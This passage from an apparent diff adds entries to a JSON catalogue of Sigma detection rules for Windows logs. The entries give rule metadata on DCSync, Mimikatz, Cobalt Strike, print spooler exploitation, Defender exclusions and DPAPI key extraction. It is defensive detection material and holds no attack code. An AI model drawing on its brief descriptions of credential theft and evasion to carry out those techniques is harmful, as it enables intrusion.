connections to external legitimate domains." + ], + "filename": "win_susp_ntlm_rdp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "n/a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "value": "Potential Remote Desktop Connection to Non-Domain Host" + }, + { + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "meta": { + "author": "mdecrevoisier", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate administrator activity" + ], + "filename": "win_sshd_openssh_server_listening_on_socket.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.004" + ] + }, + "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "value": "OpenSSH Server Listening On Socket" + }, + { + "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", + "creation_date": "2021/06/30", + "falsepositive": [ + "Problems with printer drivers" + ], + "filename": "win_exploit_cve_2021_1675_printspooler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://twitter.com/fuzzyf10w/status/1410202370835898371", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ] + }, + "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", + "value": "Possible CVE-2021-1675 Print Spooler Exploitation" + }, + { + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MalwareJake/status/1410421967463731200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ] + }, + "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "value": "CVE-2021-1675 Print Spooler Exploitation" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "value": "Azure AD Health Monitoring Agent Registry Keys Access" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "value": "Azure AD Health Service Agents Registry Keys Access" + }, + { + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "meta": { + "author": "Michaela Adams, Zach Mathis", + "creation_date": "2022/11/06", + "falsepositive": [ + "Anti-Virus" + ], + "filename": "win_security_access_token_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1134/001/", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.001" + ] + }, + "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "value": "Access Token Abuse" + }, + { + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "meta": { + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "creation_date": "2019/04/03", + "falsepositive": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1111556090137903104", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", + "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" + }, + { + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If source account name is not an admin then its super suspicious" + ], + "filename": "win_security_account_discovery.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "value": "AD Privileged Users or Groups Reconnaissance" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "value": "ADCS Certificate Template Configuration Vulnerability" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" + }, + { + "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_add_remove_computer.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" + ], + "tags": "No established tags" + }, + "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "value": "Add or Remove Computer from DC" + }, + { + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_admin_logon.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" + ], + "tags": "No established tags" + }, + "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "value": "User with Privileges Logon" + }, + { + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "meta": { + "author": "juju4", + "creation_date": "2017/10/29", + "falsepositive": [ + "Legitimate administrative activity." + ], + "filename": "win_security_admin_rdp_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2016-04-005", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" + ] + }, + "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "value": "Admin User Remote Logon" + }, + { + "description": "Detects access to $ADMIN share", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/04", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_admin_share_access.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", + "value": "Access to ADMIN$ Share" + }, + { + "description": "Detects WRITE_DAC access to a domain object", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_object_writedac_access.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "value": "AD Object WriteDAC Access" + }, + { + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_replication_non_machine_account.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "17d619c1-e020-4347-957e-1d1207455c93", + "value": "Active Directory Replication from Non Machine Account" + }, + { + "description": "Detects access to a domain user from a non-machine account", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2020/03/30", + "falsepositive": [ + "Administrators configuring new users." + ], + "filename": "win_security_ad_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", + "value": "AD User Enumeration" + }, + { + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_active_directory_user_control.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "value": "Enabled User Right in AD to Control User Objects" + }, + { + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_ad_user_backdoors.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "value": "Active Directory User Backdoors" + }, + { + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_enable_weak_encryption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2053", + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "value": "Weak Encryption Enabled and Kerberoast" + }, + { + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/31", + "falsepositive": [ + "Go utilities that use staaldraad awesome NTLM library" + ], + "filename": "win_security_alert_ruler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ] + }, + "uuid": "24549159-ac1b-479c-8175-d42aea947cae", + "value": "Hacktool Ruler" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_chafer_mar18_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "value": "Chafer Activity - Security" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_slingshot.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ] + }, + "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "value": "Defrag Deactivation - Security" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "win_security_apt_wocao.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "value": "Operation Wocao Activity - Security" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "value": "Remote Task Creation via ATSVC Named Pipe" + }, + { + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_camera_microphone_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "value": "Processes Accessing the Microphone and Webcam" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_cobaltstrike_service_installs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "value": "CobaltStrike Service Installations - Security" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research)", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers acting as printer servers too? :)" + ], + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "value": "DCERPC SMB Spoolss Named Pipe" + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dcom_iertutil_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" + }, + { + "description": "Detects Mimikatz DC sync security events", + "meta": { + "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "creation_date": "2018/06/03", + "falsepositive": [ + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" + ], + "filename": "win_security_dcsync.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" + ] + }, + "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "value": "Mimikatz DC Sync" + }, + { + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "meta": { + "author": "@BarryShooshooga", + "creation_date": "2019/10/26", + "falsepositive": [ + "Intended inclusions by administrator" + ], + "filename": "win_security_defender_bypass.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "value": "Windows Defender Exclusion Set" + }, + { + "description": "Detects an installation of a device that is forbidden by the system policy", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_device_installation_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" + ], + "tags": "No established tags" + }, + "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", + "value": "Device Installation Blocked" + }, + { + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_diagtrack_eop_default_login_username.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "value": "DiagTrackEoP Default Login Username" + }, + { + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_disable_event_logging.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", + "value": "Disabling Windows Event Auditing" + }, + { + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_backupkey_extraction.yml", + "level": "high", + 